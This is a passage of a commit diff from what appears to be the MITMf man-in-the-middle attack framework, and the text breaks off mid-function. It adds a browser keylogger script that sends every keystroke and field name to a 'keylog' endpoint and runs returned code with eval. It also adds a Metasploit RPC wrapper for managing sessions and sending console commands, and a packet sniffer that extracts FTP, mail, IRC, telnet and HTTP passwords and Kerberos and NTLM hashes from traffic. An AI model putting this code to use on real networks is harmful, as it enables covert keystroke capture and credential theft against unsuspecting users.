<button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;"> \
Update \
</button> \
\
</a> \
</li> \
</ul> \
</div> \
';
document.body.appendChild(newHTML);
document.getElementById("headerupdate").style.display = "block";
</script>

View file

@ -0,0 +1,117 @@
window.onload = function (){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener){
//console.log("first");
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
}
else if (window.attachEvent){
//console.log("second");
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
}
else {
//console.log("third");
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 0)
{
var3 = e.charCode
}
if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
}
function function1(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(encodeURIComponent(text), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=utf-8");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load diff

46
core/logger.py Normal file
View file

@ -0,0 +1,46 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
class logger:
log_level = None
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
fileHandler = logging.FileHandler(logfile)
fileHandler.setFormatter(formatter)
streamHandler = logging.StreamHandler(sys.stdout)
streamHandler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.propagate = False
logger.addHandler(streamHandler)
logger.addHandler(fileHandler)
logger.setLevel(self.log_level)
return logger

100
core/mitmfapi.py Normal file
View file

@ -0,0 +1,100 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Originally coded by @xtr4nge
"""
#import multiprocessing
import threading
import logging
import json
import sys
from flask import Flask
from core.configwatcher import ConfigWatcher
from core.proxyplugins import ProxyPlugins
app = Flask(__name__)
class mitmfapi(ConfigWatcher):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
self.host = self.config['MITMf']['MITMf-API']['host']
self.port = int(self.config['MITMf']['MITMf-API']['port'])
@app.route("/")
def getPlugins():
# example: http://127.0.0.1:9999/
pdict = {}
#print ProxyPlugins().plugin_list
for activated_plugin in ProxyPlugins().plugin_list:
pdict[activated_plugin.name] = True
#print ProxyPlugins().all_plugins
for plugin in ProxyPlugins().all_plugins:
if plugin.name not in pdict:
pdict[plugin.name] = False
#print ProxyPlugins().pmthds
return json.dumps(pdict)
@app.route("/<plugin>")
def getPluginStatus(plugin):
# example: http://127.0.0.1:9090/cachekill
for p in ProxyPlugins().plugin_list:
if plugin == p.name:
return json.dumps("1")
return json.dumps("0")
@app.route("/<plugin>/<status>")
def setPluginStatus(plugin, status):
# example: http://127.0.0.1:9090/cachekill/1 # enabled
# example: http://127.0.0.1:9090/cachekill/0 # disabled
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
def startFlask(self):
app.run(debug=False, host=self.host, port=self.port)
#def start(self):
# api_thread = multiprocessing.Process(name="mitmfapi", target=self.startFlask)
# api_thread.daemon = True
# api_thread.start()
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
api_thread.start()

View file

@ -20,66 +20,124 @@
# USA
#
import requests
import msgpack
import logging
import requests
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self,opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self,opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
class Msf(ConfigWatcher):
'''
This is just a wrapper around the Msfrpc class,
prevents a lot of code re-use throught the framework
'''
def __init__(self):
try:
self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'],
"port": self.config['MITMf']['Metasploit']['rpcport']})
self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
@property
def version(self):
return self.msf.call('core.version')['version']
def jobs(self):
return self.msf.call('job.list')
def jobinfo(self, pid):
return self.msf.call('job.info', [pid])
def killjob(self, pid):
return self.msf.call('job.kill', [pid])
def findjobs(self, name):
jobs = self.jobs()
pids = []
for pid, jobname in jobs.iteritems():
if name in jobname:
pids.append(pid)
return pids
def sessions(self):
return self.msf.call('session.list')
def sessionsfrompeer(self, peer):
sessions = self.sessions()
for n, v in sessions.iteritems():
if peer in v['tunnel_peer']:
return n
return None
def sendcommand(self, cmd):
#Create a virtual console
console_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [console_id, cmd])
if __name__ == '__main__':

929
core/netcreds.py Normal file
View file

@ -0,0 +1,929 @@
import logging
import binascii
import struct
import base64
import threading
import binascii
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in e: pass
def start(self, interface, ip):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def parse_pcap(self, pcap):
parsing_pcap=True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use idential client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if parsing_pcap is True:
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some add sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
try:
